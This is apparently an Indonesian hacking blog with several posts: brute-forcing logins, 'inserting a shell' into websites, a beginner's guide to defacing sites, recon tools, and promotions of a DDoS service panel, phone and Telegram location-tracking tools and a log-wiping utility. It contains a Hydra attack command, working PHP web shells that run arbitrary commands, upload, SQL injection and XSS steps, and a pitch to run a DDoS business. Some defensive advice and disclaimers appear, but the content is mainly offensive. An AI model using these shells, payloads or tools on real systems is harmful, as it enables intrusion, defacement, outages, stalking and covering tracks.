Friday, 24 January 2025

Apa Itu Bruteforce Login Beserta Cara dan Contohnya

Bruteforce login adalah salah satu teknik serangan keamanan di mana penyerang mencoba mendapatkan akses ke akun dengan cara menebak kombinasi username dan password secara berulang-ulang. Serangan ini memanfaatkan daftar kombinasi kredensial yang besar untuk mencoba masuk hingga menemukan pasangan yang benar.

Serangan bruteforce dapat dilakukan secara manual, tetapi biasanya menggunakan alat otomatis untuk mencoba kombinasi dengan cepat. Teknik ini sering kali digunakan untuk menyerang halaman login aplikasi web, antarmuka API, atau layanan lain yang memerlukan autentikasi.


Bagaimana Cara Kerja Bruteforce Login?

Bruteforce login bekerja dengan prinsip mencoba berbagai kombinasi username dan password secara terus-menerus hingga menemukan pasangan yang benar. Berikut adalah langkah-langkah umum:

  1. Identifikasi Target:

    • Penyerang mengidentifikasi URL atau endpoint login, seperti:

      http://example.com/login
  2. Mengumpulkan Username dan Password:

    • Penyerang menggunakan daftar username (sering disebut "wordlist") dan password yang umum digunakan, seperti yang berasal dari database yang bocor.

  3. Otomatisasi Proses:

    • Penyerang menggunakan alat seperti Hydra, Burp Suite, atau Medusa untuk mencoba kombinasi secara otomatis.

  4. Analisis Respon:

    • Setiap kali mencoba login, penyerang menganalisis respon server untuk melihat apakah kombinasi berhasil.


Jenis-Jenis Bruteforce Login

1. Bruteforce Murni

  • Penyerang mencoba semua kombinasi password secara berurutan.

  • Contoh:

    • Username: admin

    • Password: 0000, 0001, 0002, dst.

2. Dictionary Attack

  • Penyerang menggunakan daftar password yang sering digunakan.

  • Contoh wordlist:

    password
    123456
    qwerty
    letmein

3. Credential Stuffing

  • Penyerang menggunakan kombinasi username dan password dari database yang bocor.

  • Misalnya:

    user@example.com:password123
    admin@example.com:admin2023

Contoh Bruteforce Login

Contoh Manual

Penyerang mencoba login secara manual dengan kombinasi berikut:

  1. Username: admin

    • Password: password123

    • Hasil: Gagal

  2. Username: admin

    • Password: 123456

    • Hasil: Gagal

  3. Username: admin

    • Password: admin123

    • Hasil: Berhasil

Contoh dengan Tools (Hydra)

Menggunakan Hydra untuk menyerang form login:

hydra -l admin -P passwords.txt http-post-form \
"/login.php:username=^USER^&password=^PASS^:F=Invalid login"

Penjelasan:

  • -l admin: Username yang digunakan.

  • -P passwords.txt: File berisi daftar password.

  • http-post-form: Menunjukkan metode POST yang digunakan.

  • /login.php: URL target.

  • F=Invalid login: Respon server saat login gagal.


Bagaimana Melindungi dari Bruteforce Login?

1. Gunakan Captcha

  • Tambahkan captcha pada halaman login untuk mempersulit otomatisasi serangan.

2. Batasi Percobaan Login

  • Terapkan pembatasan login seperti memblokir IP setelah sejumlah percobaan gagal.

3. Gunakan Password yang Kuat

  • Edukasi pengguna untuk menggunakan kombinasi password yang panjang dan kompleks.

4. Aktifkan Two-Factor Authentication (2FA)

  • Tambahkan lapisan keamanan kedua dengan kode OTP atau autentikasi berbasis aplikasi.

5. Monitor Aktivitas Login

  • Pantau log aktivitas untuk mendeteksi percobaan login yang mencurigakan.


Penutup

Bruteforce login adalah ancaman serius yang dapat mengekspos data sensitif jika tidak ditangani dengan baik. Dengan memahami cara kerja serangan ini dan menerapkan langkah-langkah pencegahan yang tepat, risiko serangan dapat diminimalkan. Selalu pastikan untuk menjaga keamanan aplikasi Anda dengan praktik terbaik dan alat keamanan yang sesuai.

Monday, 23 December 2024

Belajar Cara Menyisipkan Shell pada Website

Dalam dunia pengembangan web, ada berbagai teknik dan cara untuk mengelola dan mengoptimalkan website. Salah satu teknik yang sering digunakan oleh pengembang adalah menyisipkan shell ke dalam website. Shell adalah skrip yang memberikan akses kontrol ke sistem operasi melalui antarmuka web. Biasanya, shell digunakan oleh pengembang atau administrator untuk mengelola server, menjalankan perintah, dan mengakses data secara efisien.


Namun, meskipun ada kegunaan yang sah, penyisipan shell sering kali disalahgunakan oleh peretas untuk mengeksploitasi situs web. Oleh karena itu, penting untuk mempelajari cara menyisipkan shell dengan benar, baik untuk tujuan pembelajaran maupun untuk memastikan situs Anda aman dari potensi ancaman.

Apa Itu Shell?

Shell adalah antarmuka pengguna yang memungkinkan kita berinteraksi dengan sistem operasi menggunakan baris perintah. Dalam konteks website, shell dapat berupa skrip berbasis web yang memungkinkan pengguna untuk menjalankan perintah di server web atau server hosting.

Shell sering digunakan dalam konteks administrasi server untuk menjalankan berbagai perintah seperti:

  • Mengelola file dan folder.
  • Menjalankan perintah sistem.
  • Melihat status aplikasi dan server.

Cara Menyisipkan Shell ke dalam Website

Menyisipkan shell ke dalam website adalah tindakan yang sebaiknya dilakukan hanya dalam konteks pengembangan atau pembelajaran, dengan izin yang sah. Berikut adalah cara sederhana untuk menambahkan shell pada website menggunakan PHP.

1. Menyisipkan Shell dengan PHP

PHP adalah salah satu bahasa pemrograman yang paling umum digunakan di website dan dapat digunakan untuk menyisipkan shell. Salah satu cara sederhana untuk melakukannya adalah dengan menggunakan fungsi shell_exec(), yang memungkinkan kita mengeksekusi perintah sistem dari dalam kode PHP.

Contoh script PHP untuk menyisipkan shell:

php

<?php // Cek apakah form telah disubmit if(isset($_POST['command'])) { $command = $_POST['command']; // Ambil perintah dari form $output = shell_exec($command); // Eksekusi perintah shell echo "<pre>$output</pre>"; // Tampilkan hasilnya } ?> <form method="POST"> <label for="command">Masukkan Perintah:</label> <input type="text" name="command" id="command" required> <input type="submit" value="Eksekusi"> </form>

Pada script di atas, pengguna dapat memasukkan perintah shell melalui form HTML, yang kemudian akan dieksekusi oleh PHP dan hasilnya ditampilkan di halaman.

2. Fungsi exec()

Fungsi lain yang sering digunakan untuk menyisipkan shell adalah exec(). Fungsi ini dapat menjalankan perintah shell di server dan mendapatkan output-nya.

php

<?php if(isset($_POST['command'])) { $command = $_POST['command']; // Ambil perintah dari form exec($command, $output); // Eksekusi perintah shell echo "<pre>"; print_r($output); // Tampilkan hasilnya dalam format yang lebih rapi echo "</pre>"; } ?> <form method="POST"> <label for="command">Masukkan Perintah:</label> <input type="text" name="command" id="command" required> <input type="submit" value="Eksekusi"> </form>

Pada contoh ini, exec() digunakan untuk mengeksekusi perintah yang dimasukkan melalui form, dan hasilnya akan ditampilkan dalam format yang lebih terstruktur.

Keamanan dalam Menyisipkan Shell

Meskipun teknik ini bisa berguna dalam lingkungan pengembangan, menyisipkan shell ke dalam website tanpa pengamanan yang tepat sangat berbahaya. Berikut adalah beberapa masalah keamanan yang mungkin muncul:

  1. Remote Code Execution (RCE): Salah satu ancaman terbesar adalah memungkinkan penyerang untuk mengeksekusi perintah berbahaya di server. Jika situs web tidak memvalidasi input dengan benar, seorang peretas dapat mengeksploitasi kerentanannya.

  2. SQL Injection: Penyisipan shell dapat dieksploitasi untuk mengakses database atau sistem internal situs Anda.

  3. Access Control: Jika kontrol akses tidak diterapkan dengan benar, siapa saja yang mengunjungi halaman tersebut bisa saja mengeksekusi perintah berbahaya tanpa izin.

Langkah-langkah untuk Meningkatkan Keamanan

Untuk mengurangi risiko yang terkait dengan penyisipan shell, berikut adalah beberapa langkah yang bisa diambil:

  1. Validasi Input: Pastikan input yang diterima dari pengguna telah divalidasi dan difilter dengan benar. Hindari perintah yang mengandung karakter atau skrip berbahaya.

  2. Gunakan Perintah yang Terbatas: Hanya izinkan eksekusi perintah-perintah tertentu yang telah dipilih sebelumnya, seperti yang berkaitan dengan tugas administrasi server yang sah.

  3. Autentikasi dan Otorisasi: Gunakan sistem autentikasi yang kuat untuk membatasi akses ke fungsi eksekusi shell. Pastikan hanya pengguna yang berwenang yang bisa menjalankan perintah.

  4. Audit dan Log: Selalu lakukan logging terhadap perintah-perintah yang dieksekusi di server, dan periksa log secara rutin untuk mendeteksi aktivitas mencurigakan.

  5. Gunakan Fitur-fitur Keamanan pada Hosting: Banyak penyedia hosting menawarkan fitur keamanan untuk mencegah eksekusi perintah berbahaya. Pastikan Anda mengaktifkan dan memanfaatkan fitur-fitur ini.

Kesimpulan

Menyisipkan shell pada website adalah teknik yang bisa berguna dalam pengembangan dan administrasi server, tetapi harus dilakukan dengan sangat hati-hati. Memahami potensi ancaman keamanan dan bagaimana cara mengurangi risiko sangat penting bagi pengembang web. Dengan implementasi yang tepat dan langkah-langkah pengamanan yang memadai, shell bisa menjadi alat yang berguna tanpa membahayakan keamanan situs web Anda.

Namun, penting untuk diingat bahwa menyisipkan shell tanpa izin yang sah atau untuk tujuan yang tidak sah adalah ilegal dan dapat berakibat serius.


DISCLAIMER : artikel ini dibuat hanya untuk edukasi dan tidak untuk mengajarkan hal buruk. jika ada yang menyalahgunakan ilmu yang saya berikan itu diluar tanggung jawab saya.

Wednesday, 11 December 2024

Belajar Deface Website untuk Pemula - Panduan Lengkap dan Etis

Belajar Deface Website untuk Pemula -  Panduan Lengkap dan Etis Deface website, atau “deface”, adalah tindakan mengubah tampilan halaman web tanpa izin. Tindakan ini sering dilakukan oleh peretas sebagai pesan atau murni kemampuannya. Namun, sebagai seorang yang baru belajar hacking, tolong perhatikan bahwa defacing tidak boleh dilakukan tanpa izin karena tindakan akan menjadi ilegal dan Anda akan berurusan dengan penyidikan yang serius. 

Artikel ini bertujuan memberikan konteks teknis tentang defacing manner agar lebih teredukasi tentang topik ini. Apa Itu Deface Website? Deface website terjadi ketika seseorang mendapatkan akses ke backend sistem website dan mengubah file atau database ke sistem tersebut, menghasilkan halaman lain yang berisi konten buatan mereka. Beberapa cara melakukannya adalah dengan mengeksploitasi celah sebagai berikut: 

 

1. Kerentanan File Upload. 

2. SQL Injection untuk mendapatkan akses admin. 

3. Cross-Site Scripting untuk mencuri sesi pengguna 

4. Penggunaan credential default 

 

Prinsip dasar deface manner: 

1. Jangan membobol website publik. Alasan: Ilegal 

2. Gunakan lab pribadi . 

1. Buat server lokal, atau gunakan XAMPP untuk membuat website palsu. 

2. Gunakan platform legal, seperti Bug Bounty atau hackthebox untuk bereksperimen 

 

Langkah belajar deface manner: 

1. Memahami dasar teknologo website 

2. Tools yang akan Anda gunakan 

3. Cari celah kerentanan. 

4. Deface.

 

Setelah mengetahui dasar-dasar website, langkah selanjutnya adalah mencari slah perangkat lunak di keamanan. Berikut adalah beberapa teknik yang biasanya digunakan untuk mendapatkan akses ke server korban:

 

File Upload Exploit

File upload vulnerability terjadi ketika file yang diunggah ke website tidak divalidasi. Berikut adalah langkah eksploitasi:

a. Cari halaman upload di website.

b. Unggah file yang berisi script malicial : PHP shell.

c. Akses file yang diunggah melalui URL:

 

Contoh payload sederhana PHP shell :

php

Setelah diunggah, Anda dapat menjalankan perintah dengan menambahkan ‘?cmd=command’ di akhir URL.

 

SQL Injection Exploitation

SQL Injection memungkinkan akses ke database dengan cara menyusipkan perintah SQL di input website. Berikut langkah sederhana:

a. Cari form login atau search, dst.

b. Uji dengan menggunakan karakter ‘ ‘ OR ‘1’=’1.

c. Jika berhasil, gunakan tools seperti SQLmap terhadap website tersebut.

 

Cross-Site Scripting XSS

XSS memungkinkan untuk menyusupkan skrip ke halaman web yang bisa mempengaruhi pengguna lain.

Contoh skrip:

alert(‘Hacked!’);

Defacing

Setelah Anda masuk ke server, langkah terakhir adalah mengganti tampilan halaman website. Biasanya, file index.html atau index.php yang digantikan. Anda dapat mengunggah file HTML berikut yang telah Anda persiapkan:

Hacked By [Your-Name]

Website Ini Telah Diretas!

Belajar Ethical Hacking Secara Bertanggung Jawab!

Saturday, 17 August 2024

Alat atau Tools Yang Digunakan Untuk Penestrasi Testing/Ethical Hacking

Halo semuanya.. kembali lagi pada blog saya yang membahas tentang ethical hacking, pada artikel kali ini saya akan membagikan tentang alat-alat yang digunakan dalam penetrasi testing/ethical hacking pada tahap awal.



Alat/tools yang digunakan terdiri dari :

1. Subfinder : adalah alat untuk pengintaian subdomian besar-besaran yang dapat di gunakan untuk menghasilkan daftar lengkap subdomain yang aktif dari sebuah website pada nama subdomain apapun.

2. Httpx : adalah untuk melakukan berbagai tugas yang terkait dengan pengujian keamana  website, seperti mengidentifikasi host aktif, menemukan port terbuka, serta menemukan aplikasi website.

Tools di atas adalah beberapa tools yang bisa kalian gunakan dalam tahap awal penetrasi testing atau ethical hacking, dari kedua cara di atas dapat kalian temukan beberapa celah keamanan website jika website yang kalian targetkan memiliki celah kerentanan dari beberala parameter sensitif dan beberapa port yang terbuka.

Nah sekian artikel saya kali ini, saya akan bahas lebih banyak lagi pada artikel lainnya.

Monday, 12 August 2024

Knight Guardian

Knight Guardian :



Website ini memiliki layanan DDOS bernama Stresser Dot gg, dan saat ini layanan tersebut tidak tersedia karena sedang ditingkatkan.
Namun, kalian bisa mendapatkan source code lengkapnya. Omong-omong, banyak layanan DDOS yang memiliki panel mereka sendiri. Jika Anda ingin memulai bisnis tanpa repot dan dengan pengelolaan yang mudah untuk pengguna atau klien Anda, Anda bisa mencoba ini dan mempermudah memulai bisnis dengan layanan DDOS.
Satu hal lagi, Anda bisa menggunakan kode sumber ini untuk mempelajari cara kerja layanan tersebut.

Ingat kami dari pihak BlackLine menyarankan untuk hanya mempelajari dan menggunakannya ke website kalian sendiri
Kami tidak bertanggung jawab atas segala kerusakan yang ditimbulkan!!


Friday, 9 August 2024

DorkSearch - Alat Pencari Hebat!

DorkSearch




DorkSearch adalah alat yang mempercepat proses Google Dorking dengan menyediakan lebih dari 7.000 dork yang sudah dibuat sebelumnya. Alat ini juga memungkinkan pengguna untuk membuat dork baru, mencampur, dan mencocokkan dork, serta menemukan dork baru. Selain itu, DorkSearch memiliki fitur AI yang membantu membuat kueri dork.


Untuk informasi lebih lengkap, kunjungi [DorkSearch](https://www.dorksearch.com/).

TelegramBD Search Bot - Alat Pencari Apapun di Telegram

Tools keren nih !




Bot ini memungkinkan Anda menemukan saluran dan grup publik, serta melihat obrolan publik mana yang sedang diikuti oleh pengguna atau pernah diikuti, menggunakan basis data yang terus diperbarui dengan lebih dari 300 juta obrolan dan 1 miliar pengguna!


🆓 Perintah gratis:

/resolve [id atau username] - Menyelesaikan nama pengguna atau ID

/search [name] - Mencari grup dan saluran

/group [name] - Mencari grup

/channel [name] - Mencari saluran

/bot [name] - Mencari bot

Tools Phunter - Alat Pencari Informasi Nomer Telepon

- Phunter



 + alat yang sangat berguna untuk menemukan informasi tentang nomor telepon.  


+ Download : Server 1

Tools CCTV - Mencari Lokasi Suatu Tempat

CCTV




Alat yang baru diluncurkan ini memungkinkan siapa saja untuk mencari pengguna Telegram di lokasi koordinat tertentu yang memiliki pengaturan tertentu yang diaktifkan, dan kemudian memplot perkiraan lokasi fisik mereka di peta, menurut pengujian 404 Media. Alat ini, dijuluki "Close-Circuit Telegram Vision" atau CCTV, memanfaatkan fitur bawaan Telegram yang disebut "Find People Nearby" yang secara default dinonaktifkan. Tujuan umum dari fitur tersebut adalah untuk menemukan pengguna Telegram lain di sekitar lokasi fisik pengguna saat ini. Sementara itu, alat baru ini memungkinkan siapa saja untuk mencari secara global orang-orang yang mengaktifkan pengaturan tersebut.


https://github.com/IvanGlinkin/CCTV

LogsKiller

Alat ini akan menghapus semua log!



wevtutil.exe (ini dapat membantu Anda menghapus log dari alamat IP dan MACs Anda dari PC Anda) aman untuk digunakan tetapi untuk lebih jelasnya periksa kepala di antivirus mana pun termasuk virustotal.com


Note : RUN AS ADMINISTRATOR !


Tutorial : https://www.youtube.com/watch?v=GL-XBCslTaA

Link download : Download